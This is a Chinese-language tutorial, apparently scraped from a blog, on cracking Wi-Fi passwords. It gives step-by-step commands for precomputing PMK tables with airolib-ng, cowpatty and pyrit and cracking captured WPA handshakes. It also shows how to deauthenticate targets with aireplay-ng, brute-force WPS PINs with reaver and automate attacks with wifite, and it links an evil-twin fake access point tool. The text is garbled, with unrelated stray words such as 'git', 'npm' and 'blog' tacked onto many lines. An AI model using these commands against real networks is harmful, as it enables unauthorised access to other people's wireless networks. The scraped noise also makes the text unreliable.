Airolibgit
設計用於存儲ESSID和密碼列表,計算生成不變的PMK(計算資源消耗型)github
PMK在破解階段被用於計算PTK(速度快,計算資源要求少)sql
經過完整性摘要值破解密碼SQLite3數據庫存儲數據數據庫
實例:npm
抓包獲取四步信息安全
echo 目標ESSID > essid.txt(建立一個ESSID文件)
airolib-ng db --import essid essid.txt(建立一個數據庫db,導入一個essid,這個essid文件存在essid.txt文件裏)
airolib-ng db --stats(查看數據庫狀態)
airolib-ng db --import passwd /usr/share/wordlists/xxx.txt(導入密碼文件,它會剔除不合格的密碼)
airolib-ng db --batch(生成PMK)
aircrack-ng -r db test-01.cap(經過抓取到的包對比db數據庫裏面的PMK破解密碼)工具
Cowpatty破解密碼 設計
同樣的,先抓包獲取四步信息3d
cowpatty -r xx-01.cap -f password.txt -s 目標essid (-r 指定抓到包的文件,-f 使用的字典,-s 目標essid)blog
使用彩虹表(PMK)
genpmk -f password.txt -d pmk -s 目標essid (-f 使用的字典 -d生成的pmk文件名 -s 目標essid)
cowpatty -r xx-01.cap -d pmk -s 目標essid (-r 指定抓到包的文件,-d 指定pmk文件,-s 目標essid)
Pyrit破解密碼
與airolib,cowpatty相同,支持基於預計算的pmk提升破解速度
獨有的優點:
CPU外,能夠運用GPU的計算能力加速生成PMK,自己支持抓包獲取四步握手過程,無需airodump抓包
也支持傳統的讀取airodump抓包獲取四步握手的方式
實例:
pyrit -r wlan0mon -o wap.cap stripLive (-r 指定抓包的網卡,-o 輸出文件名 stripLive是踢出多餘的信息)
而後配合aireplay-ng把目標打掉,獲取四步信息
會生成一個抓包文件
分析包(analyze)
從airodump抓包導入並篩選提取出新的包,剔除多餘的信息
會生成新的包
能夠直接用密碼字典破解,可是沒靈魂,使用數據庫模式破解
默認基於文件的數據庫,支持sql數據庫,將計算的PMK存入數據庫
查看默認數據庫狀態:pyrit eval
導入密碼字典:pyrit -i password.txt import_passwords(會剔除不合格的密碼)
指定ESSID:pyrit -e ESSID名 create_essid (建立essid)
計算PMK:pyrit batch (發揮GPU計算能力)
破解密碼:pyrit -r wap01.cap -b APmac attack_db
實例:
導入密碼文件
查看可用密碼文件
建立essid
計算PMK
破解密碼
WPS攻擊
WPS是wifi聯盟2006年開發的一項技術,經過pin碼來簡化無線接入的操做,無需記住PSK,路由器和網卡名各按一個按鈕就能接入無線.pin碼是分爲先後各4位的2段共8位數字
2011年被發現安全漏洞,接入發起方能夠根據路由器的返回信息判斷前4位是否正確,而pin碼的後四位只有1000種定義的組合(最後一位是checksum),因此所有窮舉破解只須要11000次嘗試,(PSK 218,340,105,584,896),標準自己沒有設定鎖定機制,目前多個廠商已實現鎖定機制
wash -i wlan0mon (發現支持wps的無線)
airodump-ng wlan0mon --wps (也能夠加上--wps參數)
爆破PIN碼
reaver -i wlan0mon -b APmac -vv
爆破出pin碼後
reaver -i wlan0mon -b APmac -vv -p PIN碼
綜合自動化無線密碼破解工具:wifite
ctrl+c中止掃描,選擇目標
它會自動逐個嘗試,WPS,握手包等等
僞造AP:3vilTwinAttacker https://github.com/wi-fi-analyzer/3vilTwinAttacker.git
友情連接 http://www.cnblogs.com/klionsec
http://www.cnblogs.com/l0cm
http://www.cnblogs.com/Anonyaptxxx
http://www.feiyusafe.cn